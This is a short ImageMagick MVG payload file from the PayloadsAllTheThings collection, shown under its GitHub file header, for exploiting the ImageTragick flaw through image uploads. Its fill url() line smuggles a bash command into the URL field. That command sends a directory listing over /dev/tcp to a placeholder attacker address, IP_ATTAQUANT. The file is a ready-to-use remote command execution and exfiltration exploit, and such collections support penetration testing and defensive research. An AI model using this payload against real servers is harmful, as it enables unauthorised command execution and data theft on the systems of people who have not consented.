PayloadsAllTheThings/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_re...

5 lines
140 B
Plaintext

push graphic-context
viewbox 0 0 640 480
fill 'url(https://IP_ATTAQUANT"||/bin/bash -c "ls > /dev/tcp/IP_ATTAQUANT/80)'
pop graphic-context